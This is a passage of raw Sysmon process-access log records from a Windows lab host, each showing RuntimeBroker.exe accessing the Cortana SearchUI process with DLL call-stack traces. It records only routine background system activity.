9cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x80000000000000007354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 